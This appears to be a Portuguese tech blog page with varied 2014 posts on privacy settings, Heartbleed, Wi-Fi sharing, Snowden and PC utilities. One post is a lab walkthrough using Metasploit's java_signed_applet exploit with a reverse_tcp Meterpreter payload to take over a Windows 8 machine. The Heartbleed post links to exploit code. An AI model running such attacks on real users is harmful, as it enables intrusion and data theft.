Invasão no Windows 8 através do Java Signed Applet

Este vulnerabilidade permite ao invasor obter qualquer dado de um computador como Windows 8, pois através de engenharia social como induzir os usuários.

Detecção de Intrusos com SNORT - Back|Track 5R3

Sistema de detecção de intrusão , nada mais é do que uma ferramenta capaz de identificar tentativas de invasão em tempo real.

Hackeando e obtendo informações de dispositivos Android

Uma técnica de "hackear" os dispositivos moveis com o sistema operacional Android. Vamos utilizar a ferramente já conhecida por alguns, o Metasploit.

quarta-feira, 18 de junho de 2014

O Facebook já anunciou que vai analisar o histórico dos seus usuários. Como impedir?




O Facebook já anunciou que vai analisar o histórico dos seus usuários, aprenda como evitar que a rede social faça isso com os seus dados.

A gigante de Palo Alto anunciou hoje (13), uma mudança significativa na rede social, o sistema do Facebook começará a analisar os hábitos de seus usuários mesmo quando eles não estiverem dentro da rede social. A razão para isso, é fornecer as empresas a possibilidade de exibir seus anúncios focados nos interesses recentes dos usuários.

O face vai ser capaz de acessar o histórico do navegador. Sendo assim quando você fizer uma busca sobre maquiagem por exemplo no Google, o Facebook vai saber que você é um potencial consumidor de maquiagem. Mesmo que você fale pouco sobre isso para os seus amigos na rede social, assim ele mostrará assuntos referentes a maquiagem, e é claro esse tipo de anúncio fará com que você compre mais. (A maquiagem é apenas um exemplo, pode ser substituído por qualquer outro tipo de produto).

Como fugir disso?
Acesse o site Digital Advertising Alliance. Ele vai analisar o seu navegador e te mostrar uma lista das empresas que fazem análise dos seus dados.
Na lista, basta escolher o Facebook (ou qualquer outra empresa que você não queira mais que analise sua navegação). Depois é só clicar no botão “Submit your choices” (enviar suas escolhas, em inglês).
Fazendo isso, você seleciona quais serviços não deverão ter acesso a essas informações.

E nos celulares?
Em dispositivos móveis, também é possível. No iOS basta entrar em “Ajustes”, em seguida “Geral”, depois “Restrições” e ir no menu “Publicidade”. É só acionar “Limitar Publicidade Rastreada”.
No Android, o caminho é “Config. Google”, em seguida “Anúncios”, depois “Desativar anúncios c/ base em interesses”. Pronto. Depois disso nenhum aplicativo poderá fornecer anúncios com base na análise de navegação.

FONTE : fatosdesconhecidos.com.br/

Conversor de PDF para Word GRATUITO e FUNCIONAL - PORTÁTIL


Bom galera, foi difícil eu encontrar um conversor gratuito e portátil para que funcionasse de verdade, esse por sinal é muito bom, mantém bem a formatação do texto e imagens. Aconselho a usar sempre!

TAMANHO: 5,3 Mb

sábado, 17 de maio de 2014

Vamos falar de HEARBLEED S2


Heartbleed é um bug de segurança na biblioteca OpenSSL criptografia de código aberto,
que é amplamente utilizado para implementar o Internet Transport Layer Security (TLS) protocolo.
Resultados Heartbleed de validação de entrada imprópria ( devido a uma limites ausentes cheque)
na implementação do Transport Layer Security (TLS) extensão batimentos cardíacos, o coração estar por trás do nome do bug. Esta vulnerabilidade é classificada como um buffer over-read.

"Esta falha permite que um atacante remoto recupere memória privada de um aplicativo que usa a biblioteca OpenSSL vulnerável em pedaços de 64k de cada vez."

A versão fixa do OpenSSL foi lançado em 07 de abril de 2014 , ao mesmo tempo que Heartbleed foi divulgada publicamente . Naquela época, cerca de 17 por cento ( cerca de meio milhão ) de servidores Web seguros da Internet certificados por autoridades confiáveis ​​, acreditava-se ser vulnerável ao ataque , permitindo o roubo de " chaves privadas e dos usuários dos servidores de cookies de sessão e senhas.

Um dos principais objetivos dos atacantes, é obter logins e senhas de acesso a contas de e-mail, mas, não para por ai. O SSL/TLS é também responsável pela comunicação segura de e-mail, mensagem instantânea e as VPNs (Virtual Private Networks).’

A falha Heartbleed não encontra-se no protocolo SSL/TSL, mas sim na biblioteca OpenSSL.

Quais versões do OpenSSL são afetados?

Estatuto dos diferentes versões:

OpenSSL 1.0.1   através 1.0.1f (inclusive) são vulneráveis 
OpenSSL 1.0.1g não é vulnerável 
OpenSSL 1.0.0   ramo não é vulnerável 
OpenSSL 0.9.8   ramo não é vulnerável

OpenSSL 1.0.1g foi liberado para resolver esta vulnerabilidade. Quaisquer chaves geradas com uma versão vulnerável do OpenSSL deve ser considerada comprometida e regenerado e implantado após o patch foi aplicado.

Sistemas operacionais? 


Algumas distribuições de sistemas operacionais já fornecidos com a versão OpenSSL são potencialmente vulnerável: 

Debian Wheezy (estável), OpenSSL 1.0.1e-2 + deb7u4 
Ubuntu 12.04.4 LTS, OpenSSL 1.0.1-4ubuntu5.11 
CentOS 6.5, OpenSSL 1.0.1e-15 
Fedora 18, OpenSSL 1.0.1e-4 
OpenBSD 5.3 (OpenSSL 1.0.1c 10 de maio de 2012) e 5,4 (OpenSSL 1.0.1c 10 de maio de 2012) 
FreeBSD 10.0 - 1.0.1e OpenSSL 11 fev 2013 
NetBSD 5.0.2 (OpenSSL 1.0.1e) 
OpenSUSE 12.2 (OpenSSL 1.0.1c) 

Distribuição do sistema operacional com as versões que não são vulneráveis​​: 

Debian Squeeze (oldstable), OpenSSL 0.9.8o-4squeeze14 
SUSE Linux Enterprise Server 
FreeBSD 8.4 - 0.9.8y OpenSSL 05 de fevereiro de 2013 
FreeBSD 9.2 - 0.9.8y OpenSSL 05 de fevereiro de 2013 
FreeBSD 10.0p1 - 1.0.1g OpenSSL (Na 08 abril 2014 18:27:46 UTC) 
FreeBSD - 1.0.1g OpenSSL (Pelo 7 abr 2014 21:46:40 UTC)

Entenda :

.

SCAN + EXPLOIT Heartbleed OpenSSL
http://pastebin.com/nfr3ivGk


SOURCE EXPLOIT - Heartbleed
http://pastebin.com/vznDZDS0

REF:
http://blog.inurl.com.br/2014/05/vamos-falar-de-hearbleed-s2.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
https://en.wikipedia.org/wiki/Heartbleed
https://www.openssl.org/news/secadv_20140407.txt
http://heartbleed.com/

sábado, 10 de maio de 2014

Substitua roteador Wi-Fi usando um notebook

É sempre bom dar alguma utilização ao que já está velho e largado em casa. Hoje, por exemplo, vamos ensinar como fazer daquele notebook gasto - com idade entre 7-8 anos - uma estação de distribuição de internet Wi-Fi, dispensando o roteador.

Antes, é importante dizer que o método apresentado abaixo só funciona com uma placa Wi-Fi compatível, que dê conta do recado. Melhor ainda se a máquina tiver sido recém-formatada.

Para este guia vamos utilizar o Windows 7, que não é tão pesado quanto o Windows 8, e é mais seguro do que o Windows XP, cujo suporte foi encerrado no mês passado pela Microsoft (e não deveria ser utilizado para entrar na internet de jeito nenhum).

Mãos à obra!

1) Conecte seu laptop ao modem, com um cabo Ethernet.

O modem de sua operadora de internet com certeza tem um cabo ethernet saindo dele (provavelmente azul). Conecte o computador à internet por meio desse cabo (não pelo Wi-Fi, isso é importante). Este é o lugar onde ele vai ficar, funcionando como roteador.

2) Crie um ponto de acesso

Esta é a principal parte. No menu iniciar digite "cmd" e, ao aparecer o arquivo "cmd.exe", clique com o botão direito nele e o execute como administrador.


No prompt de comando, digite o seguinte:

netsh wlan set hostednetwork mode=allow ssid=NOMEDAREDE key=SENHADAREDE keyUsage=persistent


No comando digitado, você deve trocar NOMEDAREDE e SENHADAREDE pelo nome e senha que você quer que sejam utilizados por sua nova rede Wi-Fi. Se tudo correr bem, três mensagens aparecerão. Veja nosso exemplo abaixo, em que utilizamos uma rede chamada "compartilha" e uma senha "senhadeteste".


Prontinho, a rede está criada, mas ainda faltam algumas configurações para que você possa usá-la.

3) Inicie sua rede Wi-Fi

Apenas um comando é responsável por ligar a rede que você acabou de criar. Basta digitar o seguinte, no mesmo prompt:

netsh wlan start hostednetwork

Isso, avançamos mais um pouco. Agora sua rede está iniciada e poderá ser encontrada por outros computadores, celulares e tablets, mas falta um último detalhe: ela não compartilha a internet neste modo. É preciso um passo simples para corrigir o problema.

4) Compartilhe a internet


Faça com que seu computador envie a internet compartilhada para todos os outros dispositivos: abra o "Painel de Controle", vá à "Central de compartilhamento de rede" e clique em "Alterar as configurações do adaptador".


Será aberta uma tela com suas conexões. Note que a conexão wireless mais recente deve ser o ponto de acesso que você criou com este tutorial (ela deve estar com o nome de dispositivo "Microsoft Virtual WiFi MiniPort Adapter"). Na figura abaixo, estão sendo mostradas a conexão local (via cabo, diretamente ligada ao modem), a conexão wireless 1 (usada para se conectar ao roteador comum, que está desligado para este guia) e a conexão wireless 2, a "compartilha", que criamos agora há pouco.


Clique com o botão direito em sua rede local COM FIO (lembre-se, seu computador recebe a internet pela rede COM FIO, e a compartilha pela rede SEM FIO), escolha "propriedades" e, na tela que abrir, Vá para a aba "Compartilhamento".


Marque a primeira opção e escolha por qual conexão Wi-Fi irá compartilhar (em nosso caso, a Wireless Connection 2).


Dê "OK" e pronto, tudo estará resolvido.

Observações:

O processo foi testado em uma conexão residencial comum, desligando o roteador da tomada e substituindo por um notebook. A conexão funcionou normalmente com outros computadores rodando Windows 7, celulares Android e iPad.

FONTE : http://olhardigital.uol.com.br/

sexta-feira, 4 de abril de 2014

Criador de Expressões Regulares


Uma das coisas mais chatas quando vamos criar ER's é ter que ficar testando se vai funcionar ou não, teu problema já era! Bastando usar o RegExrv2.0  que você saberá em tempo real se sua ER está com a estrutura correta e se está filtrando bem os resultados! Fique á vontade, basta clicar no nome dele para acessar!

terça-feira, 11 de março de 2014

Snowden: "A NSA está colocando fogo no futuro da Internet"



Edward Snowden, o ex-analista da CIA que ficou conhecido por revelar o escândalo massivo de espionagem do governo americano, fez nesta segunda-feira, 10, sua primeira aparição pública ao vivo para o público dos Estados Unidos, via Google Hangouts. A apresentação aconteceu durante o SXSW, que acontece em Austin.

Durante o evento, Snowden voltou a ressaltar a importância do respeito aos direitos da privacidade na internet. Para isso, ele defende que não apenas os governos deixem de espionar, mas que haja um investimento maior de empresas e desenvolvedores em criptografia.

Nos últimos meses, muitas informações apontavam para um rumor de que o governo americano, por meio da NSA (Agência Nacional de Segurança), seria capaz de quebrar a maioria dos tipos de criptografia existentes. Snowden, no entanto, não crê que isso esteja acontecendo de fato.

Para reafirmar sua posição sobre encriptação, ele diz que até agora o governo dos Estados Unidos não sabem quais documentos sigilosos foram vazados para jornalistas. "Eles não sabem o que foi repassado porque criptografia funciona. Precisamos pensar nela não como uma arte das trevas, mas como uma proteção contra as artes das trevas", afirmou ele.

Ele rejeita a ideia de que a NSA possua um sistema superpoderoso, capaz de quebrar qualquer tipo de criptografia. Na verdade, o que ele acha mais perigoso e mais próximo da realidade, é que o governo americano simplesmente rouba as chaves de encriptação.

"Eu acho que a criptografia irá se manter, a menos que tenhamos saltos massivos no entendimento de matemática e física", afirmou ele.

Por fim, ele voltou a atacar as práticas da NSA, afirmando que eles estão "colocando fogo no futuro da Internet", e as pessoas que assistiam as transmissões são "os bombeiros". "Precisamos de sua ajuda para corrigir isso".

Ele também reafirmou que não se arrepende do que fez, mesmo depois de ser praticamente expulso do seu país. "Independente do que acontecer comigo. Isso é algo a que nós temos direito. Eu jurei apoiar e defender a Constituição (dos Estados Unidos) e eu a vi sendo violada em escala massiva", disse, sem mostrar nenhum arrependimento com sua situação.

Quem quiser assistir ao vídeo na íntegra pode conferir abaixo (em inglês, com problemas no áudio):


FONTE : olhardigital.uol.com.br/

sábado, 8 de março de 2014

Confira 7 softwares para acelerar seu PC


O HD (disco rígido do computador) armazena diariamente uma grande quantidade de arquivos com informações de sistema, cookies de navegação, registros de programas instalados, dados de backup, entre outros. Com o passar do tempo, o sistema operacional pode ficar lento devido ao acúmulo de dados e o PC passa a demorar para iniciar e carregar os programas.

Para resolver o problema e turbinar a máquina, existem aplicativos que fazem uma verdadeira limpeza no sistema, identificando informações inúteis que podem comprometer seu desempenho e aumentando a memória disponível. Confira abaixo alguns dos softwares mais populares, todos eles disponíveis para download nos links.


O programa é um dos líderes da categoria. Fácil de usar, ele apresenta ao usuário uma lista com todos os softwares que podem ser apagados. É possível escolher aqueles que deseja eliminar e, após a tarefa, o CCleaner informa o motivo da eliminação de registros.


O limpador divide suas funções em três itens que permitem focar as tarefas em áreas do PC. A função “Turbo Boost” finaliza atividades desnecessárias que ficam em segundo plano enquanto jogos ou vídeos sejam reproduzidos. Ele traz também recursos que identificam e eliminam malwares.


O diferencial desse aplicativo é a simplicidade. Trabalhando especificamente com a memória RAM, ele exibe na tela inicial gráficos com a porcentagem do consumo atual da memória e sua quantidade livre.  São apenas dois botões: “Trim Processes’ Working Set”, que apaga a memória desnecessária, e “Clear System Cache”, que dá fim à memória cache do sistema.


O Jet Clean traz cinco opções de limpeza: registros, pastas do Windows, aplicativos, atalhos e memória RAM. Ele também desinstala completamente aplicativos e pode desfragmentar o disco rígido. É possível agendar datas e horários para limpezas.


O programa oferece 35 recursos de manutenção do Windows, ajusta as configurações do PC e elimina arquivos duplicados na memória. Para notebooks, a desenvolvedora promete prolongar a vida útil das baterias. O aplicativo é grátis para testes durante 15 dias.


O utilitário tem foco na memória RAM, e a utilização não exige a instalação. Para limpar os itens desnecessários, basta clicar em “Optimize Now” ou, se preferir, dá para rodar o programa diretamente da área de notificação.


O PrivaZer oferece duas opções de limpeza: simples e completa. Para acelerar a varredura e diminuir o tempo de espera, selecione a função “Impulsionar”.  É possível agendar o desligamento do computador depois do fim da tarefa. O aplicativo não realiza a desfragmentação de HD.

FONTE : olhardigital.uol.com.br/

quarta-feira, 26 de fevereiro de 2014

Microsoft Office 2013 Service Pack 1 (SP1) Liberado


Boas notícias para usuários do Office 2013. A Microsoft lançou o primeiro "SP1" Service Pack para o Office 2013 suite.
O SP1 para o Office 2013 vem com novas atualizações para melhorar a segurança, desempenho e estabilidade dos programas. Este service pack já contém todas as atualizações lançadas anteriormente para o Office 2013 suite.
Lista de melhorias por SP1 que valem a pena mencionar:
  • Melhora a compatibilidade com o Windows 8.1 .
  • Melhora a compatibilidade com o Internet Explorer 11 .
  • Melhora a compatibilidade com hardware moderno.
  • Fornece novas aplicações para as capacidades do Office e APIs para desenvolvedores terceiros.
  • Fornece suporte para aplicativos do painel de tarefas no Outlook 2013.
  • Fornece capacidade de inserir e usar aplicativos de conteúdo no PowerPoint 2013 slides.
O pacote está disponível tanto para 32-bit (x86), bem como 64-bit (x64). E também está disponível para o Microsoft Project 2013, Visio 2013 e SharePoint Designer 2013.
Ele está disponível no Windows Update. Se você quiser baixar o instalador offline autônomo, você pode baixá-lo usando os links a seguir:

terça-feira, 11 de fevereiro de 2014

SYSKEY: Está no seu Windows, protege seu PC e você não usa?


O Syskey é uma ferramenta que passou a ser nativa dos sistemas da Microsoft desde o Windows 2000 XP e tem como função adicionar um nível de segurança no pré-carregamento do sistema. Não confundam esta ferramenta com a senha do Setup, que também pode ser quebrada com facilidade.

Como funciona o Syskey

Os sistemas da Microsoft possuem um banco de dados chamado SAM, onde ficam armazenadas as contas de usuários. Com o Syskey ativo, este banco fica criptografado com uma senha única, ou seja,  não importa se você conhece a senha do usuário, pois sem a chave para descriptografar o SAM, o sistema não será carregado e, portanto, nem chegará a carregar as contas de usuários.

Imagine que as senhas do seu computador são cartões de acesso que estão dentro de um cofre, que por sua vez possui uma chave para ser aberto. Para acessar o computador, você precisará pegar o seu cartão e para isso precisará da chave do cofre. Essa explicação recorda um detalhe: se tiver mais de um usuário deste computador, TODOS  eles precisarão dessa chave, pois ela é única. Além disso, vale lembrar que os dados do computador não são criptografados com o SYSKEY, portanto, ele só dificulta o acesso ao sistema, mas os dados poderão ser lidos a partir de outro computador / SO. Para criptografar seus dados, aconselho o uso do Bitlocker, como demonstro neste artigo.

Agora que sabemos o que ele faz, vamos ativá-lo:

Vá ao EXECUTAR, escreva SYSKEY e aperte ENTER, logo abrirá a janela de ativação do recurso, como mostra a imagem abaixo:


Clique em ATUALIZAR e na nova janela selecione e opção INICIALIZAÇÃO DE SENHA


Agora, basta inserir a sua senha, confirmá-la e clicar em OK. Aparecerá uma mensagem de ativação da criptografia, clique em OK e reinicie o PC.

Pronto! Sempre que ligar o seu computador, precisará inserir a chave Syskey e só depois a sua senha de usuário.

Esta chave não é inquebrável, mas cria um nível de segurança extra ao seu sistema, sendo mais complexa que a senha comum. Bisbilhoteiros terão mais dificuldade para acessar o seu computador e a maioria desiste.

Espero que tenham gostado da dica. Deixem seus comentários e críticas.

Fonte  : ProfissionaisTI

sexta-feira, 31 de janeiro de 2014

Wise Data Recovery - RECUPERAR DADOS DE HD

Este pode ser comparado com o Get Data Back, porém com um detalhe adicional, ele indica quais arquivos estão prontos para uma recuperação completa ou aqueles que terão uma recuperação parcial (quase ilegível) ou os que terão perda total.

Com o Wise Data Recovery, você consegue encontrar quase tudo o que já esteve guardado no seu disco rígido e, por algum motivo, foi deletado.

O programa faz uma varredura em qualquer unidade de armazenamento: HDs, SSDs, pendrives e qualquer outra. Depois disso, o aplicativo parte para a análise dos arquivos e mostra para você se eles são recuperáveis ou não.

Dessa forma, será possível escolher o que vai ser resgatado das profundezas dos seus discos e, além disso, saber se realmente alguma coisa ainda poderá ser útil. Fora isso, se você não conseguir encontrar o que procura na grade de pastas ou na lista geral de arquivos deletados, ainda é possível usar a ferramenta de pesquisa do Wise Data Recovery.

Escolha o idioma

Antes de tudo, você precisa determinar o idioma da interface do aplicativo. Por padrão, o Wise Data Recovery é instalado em inglês, porém você pode usar o programa em português ou em vários outros idiomas. Para isso, procure e clique no botão que fica à esquerda do ícone de minimização da janela, depois selecione “Languages” e escolha “Português (Brasil)”.


Em busca do arquivo perdido

Para recuperar os dados que foram acidentalmente apagados do seu disco rígido, você precisa ter uma ideia do antigo nome do documento. Com isso em mente, vá ao topo esquerdo da janela do aplicativo e selecione a unidade de armazenamento na qual seu arquivo esteve e clique em “Escanear” ou “Scan”.

Feito isso, o programa começa a analisar todo o disco e mostra para você o que talvez possa ser recuperado. Caso o nome do arquivo seja um mistério, navegue pela grade de pastas do lado esquerdo da janela e tente encontrar o local em que o documento possa ter estado. Se você se lembrar do nome ou parte dele, vá até a barra de busca, na parte superior direita da janela, e digite o que for preciso até aparecer o que você procura.


Recupere o seus documentos

Quando você finalmente encontrar o seu arquivo perdido, observe o status dele. Se estiver verde, as chances de a recuperação ser bem-sucedida são altas. Caso o mostrador esteja amarelo ou vermelho, mesmo sendo recuperados, os seus documentos talvez fiquem inutilizados.

Se tudo estiver certo, marque quantos arquivos quiser e clique em “Recuperar” ou “Recovery”. Feito isso, uma pequena janela vai perguntar onde você deseja salvar o resultado da recuperação. Para isso, você deve escolher uma pasta fora do disco em questão, do contrário o aplicativo não realiza a tarefa.


Em alguns segundos, o Wise Data Recovery vai terminar o processo. Clique em “OK” na janela de aviso, e o programa vai abrir a pasta onde você salvou os arquivos recuperados. Agora, só é preciso testar a integridade dos documentos tentando abri-los com o aplicativo-padrão.

Tamanho : 2,5 MB

sábado, 25 de janeiro de 2014

Invasão no Windows 8 através do Java Signed Applet

Este vulnerabilidade permite ao invasor obter qualquer dado de um computador como Windows 8, pois através de engenharia social como induzir os usuários a clicaram em links através de textos os imagens esta vulnerabilidade pode ser explorada.

Conscientize amigos e colegas de trabalho para se atentarem aos links que recebem via e-mail, facebook e ente outros para evitarem se serem vítimas desta vulnerabilidade.

Uma forma de evitar é manter sempre o Windows e o Antivirus devidamente atualizados.

Dados Técnicos:

Kali Linux: 10.10.10.130
Windows 8: 10.10.10.129

Passo 01

Execute o MSF Console

root@kali:~# msfconsole


Passo 02

Utilize o exploit java_signed_applet


msf > use exploit/multi/browser/java_signed_applet


Passo 04

Defina o servidor Kali Linux (10.10.10.130) como conexão principal do exploit java_signed_applet

msf exploit (java_signed_applet) > set SRVHOST 10.10.10.130


Passo 05

Defina a porta do servidor Kali Linux (8080) como conexão principal do exploit java_signed_applet

msf exploit (java_signed_applet) > set SRVPORT 8080


Passo 06

Utilize o PAYLOAD reserve_tcp para estabelecer a conexão entre o host e o servidor


msf exploit (java_signed_applet) > set PAYLOAD windows/meterpreter/reverse_tcp


Passo 07

Defina o servidor Kali Linux (10.10.10.130) como conexão principal para o PAYLOAD reverse_tcp


msf exploit (java_signed_applet) > set LHOST 10.10.10.130


Passo 08

Defina a porta do servidor Kali Linux (10.10.10.130) como conexão principal para o PAYLOAD reverse_tcp


msf exploit (java_signed_applet) > set LPORT 4444


Passo 09

Execute o exploit para gerar a URL a ser acessada pelo Windows 8 (http://10.10.10.130:8080/clR8lKjmGpiSXqQ)

msf exploit (java_signed_applet) > exploit


Passo 10


No Windows 8 ao realizar o acesso ao link (http://10.10.10.130:8080/clR8lKjmGpiSXqQ) será exibida uma janela de Advertência de Segurança, aceite o Risco e clique em Executar


Passo 11


Observe que a conexão foi estabelecida com o servidor


Passo 12

Execute o comando sessions para exibir as sessões de conexão

msf exploit (java_signed_applet) > sessions


Passo 13

Estabeleça a conexão na sessão 1


msf exploit (java_signed_applet) > sessions -i 1


Passo 14

Com a conexão estabelecido digite comando utilizados no windows como o ipconfig para visualizar as conexões de rede


meterpreter > ipconfig


Passo 15

Utilize o comando sysinfo para exibir as Informações de Sistema, como o Nome do Computador e versão do Sistema Operacional


meterpreter > sysinfo

Passo 16

Execute o comando shell para exibir o console do Windows 8


meterpreter > shell


Passo 17

Liste todos arquivos/diretórios que estão no Desktop


C:\Users\Marcos\Desktop>dir


Passo 18

Crie o diretório 100SECURITY


C:\Users\Marcos\Desktop>mkdir 100SECURITY


Passo 19


Como pode visualizar o diretório 100SECURITY foi criado com sucesso


FONTE : 100security.com.br

terça-feira, 21 de janeiro de 2014

Fim do suporte ao sistema operacional Windows XP vai forçar bancos a atualizarem o hardware de seus equipamentos

A Microsoft já avisou faz tempo: em 2014 o Windows XP vai perder o suporte e, com isso, deixará de receber atualizações — um ano depois encerram-se também as atualizações vitais para a manutenção da segurança dos usuários. E nesse grupo de usuários estão 95% dos caixas eletrônicos de todo o mundo. Exatamente, a maioria esmagadora das máquinas de bancos são equipadas com computadores que utilizam a referida versão do sistema operacional.

E o que vai acontecer com elas? Tudo depende de como as instituições bancárias vão querer trabalhar. Segundo o site INFO, aqui no Brasil alguns bancos privados como Bradesco e o Itaú utilizam o sistema Windows XP. O primeiro já informou que vai instalar o Windows 7 nos caixas automáticos, mas o Itaú ainda não revelou o que será feito com seus equipamentos.

Bancos estatais não terão problemas com a novidade, uma vez que utilizam o sistema Linux em seus equipamentos — isso vale tanto para a Caixa Econômica Federal quanto para o Banco do Brasil. De volta às instituições que precisam realizar a alteração, é preciso mencionar um problema que pode afetar diversas instituições em todo o mundo: o hardware das máquinas utilizadas atualmente.

Hardware é um problema


O Windows XP que roda nos caixas automáticos foi lançado em 2001, enquanto o Windows 7 chegou ao mercado oito anos depois. Isso significa que existe quase uma década de diferença nos requisitos mínimos de hardware utilizado. Como você deve imaginar, os computadores dos caixas automáticos não são equipados com componentes muito poderosos, uma vez que executam apenas funções básicas.

Sabendo disso, não é difícil perceber que muitas máquinas podem não conseguir executar o Windows 7. Ou seja, além de alterar o software utilizado pelos caixas eletrônicos, os bancos ainda terão que modificar os próprios computadores. Dessa maneira, é bem possível que nem todos os bancos consigam realizar a substituição até abril, mês em que o suporte da Microsoft ao Windows XP deve ser encerrado.

Fonte: Business Week, INFO